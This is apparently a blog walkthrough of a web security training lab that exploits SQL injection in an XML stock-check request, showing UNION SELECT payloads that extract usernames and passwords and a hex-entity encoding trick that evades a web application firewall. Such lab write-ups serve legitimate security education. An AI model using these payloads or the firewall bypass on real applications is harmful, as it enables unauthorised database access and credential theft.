Lab 17 : SQL injection with filter bypass via XML encoding

Problem Statement : 

This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.

The database contains a users table, which contains the usernames and passwords of registered users. To solve the lab, perform a SQL injection attack to retrieve the admin user’s credentials, then log in to their account.

Steps to solve this lab is –

  1. First you need to open the website and launch burpsuit.
  2. Now, as mentioned above in the problem statement, the vulnerability is in its stock check feature.

Which means Click on View Details under any one ITEM listed on the site.

Then at the bottom you will see Check Stock button.

Next is we need to capture the traffic of this Check Stock feature. So turn on the proxy on burp and click Check stock.

As you can see on to the right side we got this XML tag where it has captured the tag <StoreID> 1 < /storeID>

Now send this request to Repeater. We have to perform few more tests here.

Next, simply try this, under this tag

Type 1+1

And you will see the result the units values are changing.

Next Let’s try UNION SELECT NULL instead of 1 + 1.

It now says attack detected & Observe that your request has been blocked due to being flagged as a potential attack..  So we need to Encode this UNION SELECT NULL and then try.

Bypass the WAF

  1. As you’re injecting into XML, try obfuscating your payload using XML entities. One way to do this is using the Hackvertor extension. Just highlight your input, right-click, then select Extensions > Hackvertor > Encode > dec_entities/hex_entities.

Note :  You can install this tool HackVertor via the burpstore.

Next – SELECT your String and Right click and Click hackvertor > Send to Hackvertor.

Next – you will see the string 1 UNION SELECT NULL is getting encoded under some tags.

Example – <@auto_decode_no_decrypt>1 UNION SELECT NULL<@/auto_decode_no_decrypt>

Next – We need to add our string under – <@hex_entities> tag.

And Resend the request and notice that you now receive a normal response from the application. This suggests that you have successfully bypassed the WAF.

Example :

<@hex_entities>1 UNION SELECT NULL <@/hex_entities>

Next we can try to retrieve username column data here

<@hex_entities>1 UNION SELECT  username from users<@/hex_entities>

Next – to get the password as well, we will have to do string concatenation.

<@hex_entities>1 UNION SELECT username || ‘~’ || password from users<@/hex_entities>

Login with user name and password. Done flag captured.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s